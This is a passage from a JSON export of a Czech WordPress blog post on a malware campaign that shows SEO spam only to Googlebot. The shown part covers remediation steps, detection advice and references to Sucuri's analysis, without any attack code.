nem\u00e1 serv\u00edrovat payload, p\u0159ed\u00e1 \u0159\u00edzen\u00ed b\u011b\u017en\u00e9mu vykreslen\u00ed webu.<\/li>\n\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Remediace a prevence: co m\u00e1 re\u00e1ln\u00fd efekt<\/h2>\n\n\n\n<p>U podobn\u00fdch kompromitac\u00ed je d\u016fle\u017eit\u00e9 d\u011blat \u00faklid systematicky, ne jen \u201esmazat jednu podez\u0159elou v\u011bc\u201c. P\u0159\u00edmo ve zdroji jsou doporu\u010den\u00e9 tyto kroky:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Odstranit nezn\u00e1m\u00e9 soubory\/adres\u00e1\u0159e a vr\u00e1tit zm\u011bn\u011bn\u00e9 soubory do \u010dist\u00e9ho stavu (ide\u00e1ln\u011b z ov\u011b\u0159en\u00e9ho zdroje \/ bal\u00ed\u010dku).<\/li>\n\n\n<li>Zkontrolovat u\u017eivatele ve WordPressu a odstranit podez\u0159el\u00e9 administr\u00e1tory (typicky \u201epomocn\u00fd\u201c \u00fa\u010det vytvo\u0159en\u00fd \u00fato\u010dn\u00edkem).<\/li>\n\n\n<li>Resetovat p\u0159\u00edstupy: WordPress admin, FTP\/SFTP, hosting panel, datab\u00e1ze.<\/li>\n\n\n<li>Zkontrolovat vlastn\u00ed pracovn\u00ed stanici (AV\/malware scan) \u2013 kompromitace \u010dasto za\u010d\u00edn\u00e1 od ukraden\u00fdch p\u0159\u00edstup\u016f.<\/li>\n\n\n<li>Udr\u017eovat aktualizace WordPressu, plugin\u016f a \u0161ablon.<\/li>\n\n\n<li>Nasadit WAF (Web Application Firewall) \u2013 pom\u00e1h\u00e1 blokovat komunikaci na zn\u00e1m\u00e9 \u0161kodliv\u00e9 endpointy a \u010dasto i prvotn\u00ed upload zraniteln\u00e9ho pluginu nebo webshellu.<\/li>\n\n<\/ul>\n\n\n\n<div class=\"wp-block-group callout callout-warning is-style-warning is-layout-flow wp-block-group-is-layout-flow\" style=\"border-width:1px;border-radius:8px;padding-top:1rem;padding-right:1.5rem;padding-bottom:1rem;padding-left:1.5rem\">\n\n<h4 class=\"wp-block-heading callout-title\">Praktick\u00e1 pozn\u00e1mka k detekci<\/h4>\n\n\n<p>Pokud se spol\u00e9h\u00e1\u0161 jen na ru\u010dn\u00ed proklik webu v prohl\u00ed\u017ee\u010di, tenhle typ \u00fatoku snadno p\u0159ehl\u00e9dne\u0161. D\u00e1v\u00e1 smysl hl\u00eddat integritu soubor\u016f (File Integrity Monitoring) a pravideln\u011b kontrolovat indexovan\u00e9 URL v Google Search Console.<\/p>\n\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Shrnut\u00ed: selektivn\u00ed cloaking u\u017e nen\u00ed \u201ejen UA string\u201c<\/h2>\n\n\n\n<p>Tahle kampa\u0148 dob\u0159e ilustruje trend: \u00fato\u010dn\u00edci p\u0159est\u00e1vaj\u00ed d\u011blat n\u00e1padn\u00e9 v\u011bci a rad\u011bji z napaden\u00e9ho webu ud\u011blaj\u00ed \u0159\u00edzenou br\u00e1nu pro obsah ur\u010den\u00fd vyhled\u00e1va\u010d\u016fm. Ov\u011b\u0159en\u00ed Googlebotu p\u0159es ASN\/CIDR a bitov\u00e9 operace (nav\u00edc s IPv6) v\u00fdrazn\u011b sni\u017euje \u0161anci, \u017ee se probl\u00e9m projev\u00ed p\u0159i b\u011b\u017en\u00e9 kontrole.<\/p>\n\n\n\n<p>Pro v\u00fdvoj\u00e1\u0159e a spr\u00e1vce WordPressu z toho plyne jednoduch\u00e1 priorita: hl\u00eddat zm\u011bny v core souborech (zejm\u00e9na <code>index.php<\/code>), m\u00edt p\u0159ehled o tom, co se indexuje, a incident \u0159e\u0161it jako kompromitaci cel\u00e9 instalace \u2013 ne jako izolovan\u00fd \u201edivn\u00fd redirect\u201c.<\/p>\n\n\n<div class=\"references-section\">\n                <h2>Reference \/ Zdroje<\/h2>\n                <ul class=\"references-list\"><li><a href=\"https:\/\/blog.sucuri.net\/2026\/01\/malware-intercepts-googlebot-via-ip-verified-conditional-logic.html\" target=\"_blank\" rel=\"noopener noreferrer\">Malware Intercepts Googlebot via IP-Verified Conditional Logic<\/a><\/li><li><a href=\"https:\/\/blog.sucuri.net\/2026\/01\/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html\" target=\"_blank\" rel=\"noopener noreferrer\">Google sees spam, you see your site: a cloaked SEO spam attack<\/a><\/li><li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/5a006beedf563c6215a31746d011d13fd4f2561a1bf3b557484c4532b13e1ec6?nocache=1\" target=\"_blank\" rel=\"noopener noreferrer\">VirusTotal URL report<\/a><\/li><li><a href=\"https:\/\/publicwww.com\/websites\/amp-samaresmanor.pages\/\" target=\"_blank\" rel=\"noopener noreferrer\">publicwww.com results for amp-samaresmanor.pages<\/a><\/li><li><a href=\"https:\/\/sucuri.net\/website-firewall\/\" target=\"_blank\" rel=\"noopener noreferrer\">Sucuri Website Firewall<\/a><\/li><li><a href=\"https:\/\/sucuri.net\/malware-detection-scanning\/\" target=\"_blank\" rel=\"noopener noreferrer\">File Integrity Monitoring (Sucuri Malware Detection &amp; Scanning)<\/a><\/li><\/ul>\n            <\/div>","protected":false},"excerpt":{"rendered":"<p>\u00dato\u010dn\u00edci \u010d\u00edm d\u00e1l \u010dast\u011bji p\u0159est\u00e1vaj\u00ed d\u011blat lacin\u00e9 p\u0159esm\u011brov\u00e1n\u00ed pro ka\u017ed\u00e9ho. M\u00edsto toho c\u00edl\u00ed jen na Googlebot \u2013 a b\u011b\u017en\u00fdm n\u00e1v\u0161t\u011bvn\u00edk\u016fm (i majiteli webu) nechaj\u00ed zobrazit naprosto norm\u00e1ln\u00ed obsah.<\/p>\n","protected":false},"author":35,"featured_media":69,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[60,59,57,58,10],"class_list":["post-76","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezpecnost","tag-cloaking","tag-googlebot","tag-malware","tag-seo","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts\/76","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/comments?post=76"}],"version-history":[{"count":1,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts\/76\/revisions"}],"predecessor-version":[{"id":99,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/posts\/76\/revisions\/99"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/media\/69"}],"wp:attachment":[{"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/media?parent=76"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/categories?post=76"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/helloblog.io\/cs\/wp-json\/wp\/v2\/tags?post=76"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}